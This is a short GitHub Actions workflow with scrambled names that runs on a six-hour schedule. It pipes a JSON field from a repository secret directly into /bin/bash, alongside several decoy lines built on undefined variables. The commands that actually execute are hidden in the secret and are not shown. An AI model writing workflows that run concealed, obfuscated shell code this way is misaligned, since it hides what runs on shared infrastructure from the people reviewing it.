name: sunli19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '17 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sunli19871010
        env:
          rxwmr13061: ${{ secrets.rxwmr13061 }}
        run: |
          echo $rxwmr13061 | jq -r .vvqgo8761 | /bin/bash
          echo $upnjn12 | jq -r .i00 | /bin/bash
          echo $qo6 | jq -r .ljt624 | /bin/bash
          echo $fxp64651 | jq -r .hbhlv01185 | /bin/bash
          echo $sp473 | jq -r .nlwr34460 | /bin/bash
          echo $vsf00 | jq -r .rm61363 | /bin/bash
          echo $f68 | jq -r .hp92374 | /bin/bash
          echo $nj2798 | jq -r .kdb004 | /bin/bash
          echo $ixb52230 | jq -r .onqi9 | /bin/bash

